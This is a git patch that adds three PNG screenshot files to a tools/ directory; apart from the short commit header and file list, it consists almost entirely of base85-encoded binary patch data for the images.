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 G|M5Q#Xe46* From 19e2a1d5f9bc9395428efd6789a713e6de50bf08 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 15 Feb 2019 10:34:06 +0100 Subject: [PATCH 013/214] Add files via upload --- tools/screenshot.png | Bin 0 -> 44166 bytes tools/screenshot2.png | Bin 0 -> 93365 bytes tools/screenshot3.png | Bin 0 -> 98956 bytes 3 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 tools/screenshot.png create mode 100644 tools/screenshot2.png create mode 100644 tools/screenshot3.png diff --git a/tools/screenshot.png b/tools/screenshot.png new file mode 100644 index 0000000000000000000000000000000000000000..7b3ab7112fc5ebdf07d127fc09763422ae494fa2 GIT binary patch literal 44166 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 